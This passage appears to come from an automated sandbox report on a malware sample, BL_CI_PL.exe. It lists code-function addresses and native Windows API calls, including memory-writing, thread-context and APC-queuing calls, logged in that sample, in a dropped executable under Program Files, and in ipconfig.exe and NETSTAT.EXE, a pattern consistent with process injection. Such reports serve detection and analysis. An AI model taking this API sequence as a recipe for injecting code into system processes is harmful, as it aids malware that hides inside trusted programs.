        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_033FD62C28_2_033FD62C
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0340162328_2_03401623
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0341F6F628_2_0341F6F6
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_033D36EC28_2_033D36EC
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_033A555028_2_033A5550
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_034175C628_2_034175C6
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0341F5C928_2_0341F5C9
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_033F549028_2_033F5490
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_033CD48028_2_033CD480
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0339DB1928_2_0339DB19
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0341FB2E28_2_0341FB2E
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_033F1B8028_2_033F1B80
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0337FAA028_2_0337FAA0
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0341FA8928_2_0341FA89
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_033299E828_2_033299E8
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_033A59C028_2_033A59C0
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0341F87228_2_0341F872
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0336380028_2_03363800
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0336987028_2_03369870
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0337B87028_2_0337B870
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_033D587028_2_033D5870
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_033D98B228_2_033D98B2
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_034118DA28_2_034118DA
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_034178F328_2_034178F3
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0341FF6328_2_0341FF63
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_033DFF4028_2_033DFF40
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03411FC628_2_03411FC6
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03403FA028_2_03403FA0
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03361EB228_2_03361EB2
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03419ED228_2_03419ED2
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03417D4C28_2_03417D4C
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03413D2228_2_03413D22
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0341FD2728_2_0341FD27
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_033FFDF428_2_033FFDF4
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03369DD028_2_03369DD0
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03363C6028_2_03363C60
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_033F9C9828_2_033F9C98
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_033E7CE828_2_033E7CE8
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0337FCE028_2_0337FCE0
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_007D8C7B28_2_007D8C7B
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_007D8C8028_2_007D8C80
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_007D2D9028_2_007D2D90
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 1_2_02B42897 NtProtectVirtualMemory,1_2_02B42897
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F2EB0 NtProtectVirtualMemory,LdrInitializeThunk,10_2_1E8F2EB0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F2ED0 NtResumeThread,LdrInitializeThunk,10_2_1E8F2ED0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F2E50 NtCreateSection,LdrInitializeThunk,10_2_1E8F2E50
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F2F00 NtCreateFile,LdrInitializeThunk,10_2_1E8F2F00
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F2CF0 NtDelayExecution,LdrInitializeThunk,10_2_1E8F2CF0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F2C30 NtMapViewOfSection,LdrInitializeThunk,10_2_1E8F2C30
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F2C50 NtUnmapViewOfSection,LdrInitializeThunk,10_2_1E8F2C50
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F2DA0 NtReadVirtualMemory,LdrInitializeThunk,10_2_1E8F2DA0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F2DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,10_2_1E8F2DC0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F2D10 NtQuerySystemInformation,LdrInitializeThunk,10_2_1E8F2D10
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F2B90 NtFreeVirtualMemory,LdrInitializeThunk,10_2_1E8F2B90
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F2BC0 NtQueryInformationToken,LdrInitializeThunk,10_2_1E8F2BC0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F2B10 NtAllocateVirtualMemory,LdrInitializeThunk,10_2_1E8F2B10
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F29F0 NtReadFile,LdrInitializeThunk,10_2_1E8F29F0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F34E0 NtCreateMutant,LdrInitializeThunk,10_2_1E8F34E0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F2E80 NtCreateProcessEx,10_2_1E8F2E80
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F2EC0 NtQuerySection,10_2_1E8F2EC0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F2E00 NtQueueApcThread,10_2_1E8F2E00
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F2FB0 NtSetValueKey,10_2_1E8F2FB0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F2F30 NtOpenDirectoryObject,10_2_1E8F2F30
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F3C90 NtOpenThread,10_2_1E8F3C90
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F2CD0 NtEnumerateKey,10_2_1E8F2CD0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F2C10 NtOpenProcess,10_2_1E8F2C10
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F2C20 NtSetInformationFile,10_2_1E8F2C20
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F3C30 NtOpenProcessToken,10_2_1E8F3C30
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F2D50 NtWriteVirtualMemory,10_2_1E8F2D50
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F2A80 NtClose,10_2_1E8F2A80
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F2AA0 NtQueryInformationFile,10_2_1E8F2AA0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F2AC0 NtEnumerateValueKey,10_2_1E8F2AC0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F2A10 NtWriteFile,10_2_1E8F2A10
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F2B80 NtCreateKey,10_2_1E8F2B80
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F2BE0 NtQueryVirtualMemory,10_2_1E8F2BE0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F2B00 NtQueryValueKey,10_2_1E8F2B00
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F2B20 NtQueryInformationProcess,10_2_1E8F2B20
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F38D0 NtGetContextThread,10_2_1E8F38D0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F29D0 NtWaitForSingleObject,10_2_1E8F29D0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F4570 NtSuspendThread,10_2_1E8F4570
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F4260 NtSetContextThread,10_2_1E8F4260
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A534E0 NtCreateMutant,LdrInitializeThunk,14_2_03A534E0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A52B80 NtCreateKey,LdrInitializeThunk,14_2_03A52B80
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A52B90 NtFreeVirtualMemory,LdrInitializeThunk,14_2_03A52B90
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A52BC0 NtQueryInformationToken,LdrInitializeThunk,14_2_03A52BC0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A52A80 NtClose,LdrInitializeThunk,14_2_03A52A80
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A529F0 NtReadFile,LdrInitializeThunk,14_2_03A529F0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A52FB0 NtSetValueKey,LdrInitializeThunk,14_2_03A52FB0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A52F00 NtCreateFile,LdrInitializeThunk,14_2_03A52F00
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A52E50 NtCreateSection,LdrInitializeThunk,14_2_03A52E50
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A52DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,14_2_03A52DC0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A52D10 NtQuerySystemInformation,LdrInitializeThunk,14_2_03A52D10
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A52CF0 NtDelayExecution,LdrInitializeThunk,14_2_03A52CF0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A52C30 NtMapViewOfSection,LdrInitializeThunk,14_2_03A52C30
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A54260 NtSetContextThread,14_2_03A54260
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A54570 NtSuspendThread,14_2_03A54570
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A52BE0 NtQueryVirtualMemory,14_2_03A52BE0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A52B20 NtQueryInformationProcess,14_2_03A52B20
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A52B00 NtQueryValueKey,14_2_03A52B00
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A52B10 NtAllocateVirtualMemory,14_2_03A52B10
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A52AA0 NtQueryInformationFile,14_2_03A52AA0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A52AC0 NtEnumerateValueKey,14_2_03A52AC0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A52A10 NtWriteFile,14_2_03A52A10
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A529D0 NtWaitForSingleObject,14_2_03A529D0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A538D0 NtGetContextThread,14_2_03A538D0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A52F30 NtOpenDirectoryObject,14_2_03A52F30
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A52EB0 NtProtectVirtualMemory,14_2_03A52EB0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A52E80 NtCreateProcessEx,14_2_03A52E80
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A52EC0 NtQuerySection,14_2_03A52EC0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A52ED0 NtResumeThread,14_2_03A52ED0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A52E00 NtQueueApcThread,14_2_03A52E00
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A52DA0 NtReadVirtualMemory,14_2_03A52DA0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A52D50 NtWriteVirtualMemory,14_2_03A52D50
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A53C90 NtOpenThread,14_2_03A53C90
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A52CD0 NtEnumerateKey,14_2_03A52CD0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A52C20 NtSetInformationFile,14_2_03A52C20
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A53C30 NtOpenProcessToken,14_2_03A53C30
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A52C10 NtOpenProcess,14_2_03A52C10
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A52C50 NtUnmapViewOfSection,14_2_03A52C50
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_02F38690 NtReadFile,14_2_02F38690
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_02F38710 NtClose,14_2_02F38710
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_02F385E0 NtCreateFile,14_2_02F385E0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_02F3868D NtReadFile,14_2_02F3868D
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_02F3870A NtClose,14_2_02F3870A
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 23_2_02A82897 NtProtectVirtualMemory,23_2_02A82897
        Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 24_2_0000020622240D02 NtCreateFile,24_2_0000020622240D02
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 25_2_02BD2897 NtProtectVirtualMemory,25_2_02BD2897
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8F34E0 NtCreateMutant,LdrInitializeThunk,26_2_1E8F34E0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8F2EB0 NtProtectVirtualMemory,LdrInitializeThunk,26_2_1E8F2EB0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8F2ED0 NtResumeThread,LdrInitializeThunk,26_2_1E8F2ED0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8F2E50 NtCreateSection,LdrInitializeThunk,26_2_1E8F2E50
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8F2F00 NtCreateFile,LdrInitializeThunk,26_2_1E8F2F00
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8F2CF0 NtDelayExecution,LdrInitializeThunk,26_2_1E8F2CF0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8F2C30 NtMapViewOfSection,LdrInitializeThunk,26_2_1E8F2C30
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8F2C50 NtUnmapViewOfSection,LdrInitializeThunk,26_2_1E8F2C50
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8F2DA0 NtReadVirtualMemory,LdrInitializeThunk,26_2_1E8F2DA0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8F2DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,26_2_1E8F2DC0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8F2D10 NtQuerySystemInformation,LdrInitializeThunk,26_2_1E8F2D10
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8F2B90 NtFreeVirtualMemory,LdrInitializeThunk,26_2_1E8F2B90
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8F2BC0 NtQueryInformationToken,LdrInitializeThunk,26_2_1E8F2BC0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8F2B10 NtAllocateVirtualMemory,LdrInitializeThunk,26_2_1E8F2B10
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8F29F0 NtReadFile,LdrInitializeThunk,26_2_1E8F29F0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8F3C90 NtOpenThread,26_2_1E8F3C90
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8F3C30 NtOpenProcessToken,26_2_1E8F3C30
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8F38D0 NtGetContextThread,26_2_1E8F38D0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8F2E80 NtCreateProcessEx,26_2_1E8F2E80
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8F2EC0 NtQuerySection,26_2_1E8F2EC0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8F2E00 NtQueueApcThread,26_2_1E8F2E00
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8F2FB0 NtSetValueKey,26_2_1E8F2FB0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8F2F30 NtOpenDirectoryObject,26_2_1E8F2F30
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8F2CD0 NtEnumerateKey,26_2_1E8F2CD0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8F2C10 NtOpenProcess,26_2_1E8F2C10
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8F2C20 NtSetInformationFile,26_2_1E8F2C20
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8F2D50 NtWriteVirtualMemory,26_2_1E8F2D50
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8F2A80 NtClose,26_2_1E8F2A80
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8F2AA0 NtQueryInformationFile,26_2_1E8F2AA0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8F2AC0 NtEnumerateValueKey,26_2_1E8F2AC0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8F2A10 NtWriteFile,26_2_1E8F2A10
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8F2B80 NtCreateKey,26_2_1E8F2B80
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8F2BE0 NtQueryVirtualMemory,26_2_1E8F2BE0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8F2B00 NtQueryValueKey,26_2_1E8F2B00
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8F2B20 NtQueryInformationProcess,26_2_1E8F2B20
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8F29D0 NtWaitForSingleObject,26_2_1E8F29D0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8F4570 NtSuspendThread,26_2_1E8F4570
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8F4260 NtSetContextThread,26_2_1E8F4260
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8F34E0 NtCreateMutant,LdrInitializeThunk,27_2_1E8F34E0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8F2EB0 NtProtectVirtualMemory,LdrInitializeThunk,27_2_1E8F2EB0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8F2ED0 NtResumeThread,LdrInitializeThunk,27_2_1E8F2ED0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8F2E50 NtCreateSection,LdrInitializeThunk,27_2_1E8F2E50
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8F2F00 NtCreateFile,LdrInitializeThunk,27_2_1E8F2F00
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8F2CF0 NtDelayExecution,LdrInitializeThunk,27_2_1E8F2CF0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8F2C30 NtMapViewOfSection,LdrInitializeThunk,27_2_1E8F2C30
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8F2C50 NtUnmapViewOfSection,LdrInitializeThunk,27_2_1E8F2C50
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8F2DA0 NtReadVirtualMemory,LdrInitializeThunk,27_2_1E8F2DA0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8F2DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,27_2_1E8F2DC0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8F2D10 NtQuerySystemInformation,LdrInitializeThunk,27_2_1E8F2D10
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8F2B90 NtFreeVirtualMemory,LdrInitializeThunk,27_2_1E8F2B90
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8F2BC0 NtQueryInformationToken,LdrInitializeThunk,27_2_1E8F2BC0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8F2B10 NtAllocateVirtualMemory,LdrInitializeThunk,27_2_1E8F2B10
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8F29F0 NtReadFile,LdrInitializeThunk,27_2_1E8F29F0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8F3C90 NtOpenThread,27_2_1E8F3C90
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8F3C30 NtOpenProcessToken,27_2_1E8F3C30
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8F38D0 NtGetContextThread,27_2_1E8F38D0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8F2E80 NtCreateProcessEx,27_2_1E8F2E80
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8F2EC0 NtQuerySection,27_2_1E8F2EC0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8F2E00 NtQueueApcThread,27_2_1E8F2E00
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8F2FB0 NtSetValueKey,27_2_1E8F2FB0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8F2F30 NtOpenDirectoryObject,27_2_1E8F2F30
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8F2CD0 NtEnumerateKey,27_2_1E8F2CD0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8F2C10 NtOpenProcess,27_2_1E8F2C10
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8F2C20 NtSetInformationFile,27_2_1E8F2C20
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8F2D50 NtWriteVirtualMemory,27_2_1E8F2D50
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8F2A80 NtClose,27_2_1E8F2A80
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8F2AA0 NtQueryInformationFile,27_2_1E8F2AA0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8F2AC0 NtEnumerateValueKey,27_2_1E8F2AC0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8F2A10 NtWriteFile,27_2_1E8F2A10
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8F2B80 NtCreateKey,27_2_1E8F2B80
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8F2BE0 NtQueryVirtualMemory,27_2_1E8F2BE0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8F2B00 NtQueryValueKey,27_2_1E8F2B00
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8F2B20 NtQueryInformationProcess,27_2_1E8F2B20
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8F29D0 NtWaitForSingleObject,27_2_1E8F29D0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8F4570 NtSuspendThread,27_2_1E8F4570
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8F4260 NtSetContextThread,27_2_1E8F4260
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03392B10 NtAllocateVirtualMemory,LdrInitializeThunk,28_2_03392B10
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03392B00 NtQueryValueKey,LdrInitializeThunk,28_2_03392B00
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03392B90 NtFreeVirtualMemory,LdrInitializeThunk,28_2_03392B90
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03392B80 NtCreateKey,LdrInitializeThunk,28_2_03392B80
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03392BC0 NtQueryInformationToken,LdrInitializeThunk,28_2_03392BC0
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03392A80 NtClose,LdrInitializeThunk,28_2_03392A80
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03392AC0 NtEnumerateValueKey,LdrInitializeThunk,28_2_03392AC0
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_033929F0 NtReadFile,LdrInitializeThunk,28_2_033929F0
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03392F00 NtCreateFile,LdrInitializeThunk,28_2_03392F00
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03392FB0 NtSetValueKey,LdrInitializeThunk,28_2_03392FB0
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03392E50 NtCreateSection,LdrInitializeThunk,28_2_03392E50
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03392D10 NtQuerySystemInformation,LdrInitializeThunk,28_2_03392D10
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03392DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,28_2_03392DC0
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03392C30 NtMapViewOfSection,LdrInitializeThunk,28_2_03392C30
